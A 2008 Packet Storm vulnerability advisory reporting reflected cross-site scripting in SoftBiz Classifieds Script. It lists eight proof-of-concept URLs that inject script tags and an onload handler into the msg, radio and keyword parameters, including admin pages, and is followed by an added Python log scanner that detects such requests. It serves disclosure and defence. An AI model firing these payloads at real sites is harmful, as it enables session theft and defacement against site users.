classifieds-xss.txt

2008-12-01T00:00:00
ID PACKETSTORM:72470
Type packetstorm
Reporter Pouya Server
Modified 2008-12-01T00:00:00

Description

`#########################################################  
---------------------------------------------------------  
Portal Name: Classifieds Script  
Vendor :  
http://www.softbizscripts.com/online-classifieds-script-features.php  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : (XSS)  
---------------------------------------------------------  
#########################################################  
[XSS]:  
http://www.site.com/[Path]/showcategory.php?cid=9&type=1&keyword=Pouya&radio=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>  
http://www.site.com/[Path]/advertisers/signinform.php?msg=</title><ScRiPt%20%0a%0d>alert(455695710637)%3B</ScRiPt>&show_form=no  
http://www.site.com/[Path]/gallery.php?type=2&keyword=111-222-1933email@address.tst&radio=>"><ScRiPt%20%0a%0d>alert(436145568828)%3B</ScRiPt>&cid=0  
http://www.site.com/[Path]/lostpassword.php?msg=<ScRiPt%20%0a%0d>alert(434915558474)%3B</ScRiPt>  
http://www.site.com/[Path]/showcategory.php?cid=9&type=1&keyword=111-222-1933email@address.tst&radio=>"><ScRiPt%20%0a%0d>alert(398524956207)%3B</ScRiPt>  
http://www.site.com/[Path]/signinform.php?msg=<body+onload=alert(431475526414)>&pid=0  
http://www.site.com/[Path]/admin/adminhome.php?tmp=1&msg=</textarea><ScRiPt%20%0a%0d>alert(477365890784)%3B</ScRiPt>  
http://www.site.com/[Path]/admin/index.php?msg=</textarea><ScRiPt%20%0a%0d>alert(476295881324)%3B</ScRiPt>  
---------------------------------  
  
Victim :  
http://www.softbizscripts.com/scripts/classified  
`
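
Added example, not part of the original advisory: a log check that flags requests carrying markup in the `msg`, `radio` or `keyword` parameters used in the URLs above. It assumes a common/combined-format access log and a hypothetical `/classifieds/` install path; the sample log lines are constructed, and only single percent-encoding is decoded.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory shows being reflected into the page.
REFLECTED_PARAMS = {"msg", "radio", "keyword"}

# After decoding, none of these parameters should carry a tag opener/closer
# or an inline event-handler attribute. Case-insensitive, so ScRiPt matches.
MARKUP = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=", re.IGNORECASE)

# Request line inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def flagged_params(target):
    """Names of reflected parameters whose decoded value contains markup."""
    hits = []
    # parse_qsl percent-decodes values and turns '+' into a space.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in REFLECTED_PARAMS and MARKUP.search(value):
            hits.append(name)
    return hits

def scan(log_lines):
    """Return (path, [param, ...]) for each log line that trips the check."""
    findings = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        hits = flagged_params(m.group(1))
        if hits:
            findings.append((urlsplit(m.group(1)).path, hits))
    return findings

# Constructed sample log lines (documentation IP, hypothetical install path).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Dec/2008:10:00:00 +0000] "GET /classifieds/showcategory.php?cid=9&type=1&keyword=bike&radio=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Dec/2008:10:00:05 +0000] "GET /classifieds/lostpassword.php?msg=%3CScRiPt%20%0a%0d%3Ealert(1)%3B%3C/ScRiPt%3E HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Dec/2008:10:00:09 +0000] "GET /classifieds/signinform.php?msg=%3Cbody+onload=alert(1)%3E&pid=0 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Dec/2008:10:00:12 +0000] "GET /classifieds/admin/index.php?msg=Login+failed HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for path, params in scan(SAMPLE_LOG):
        print(path, params)
```

A hit here only shows that markup was sent; whether it executed depends on whether the script HTML-encodes the parameter when writing it into the page.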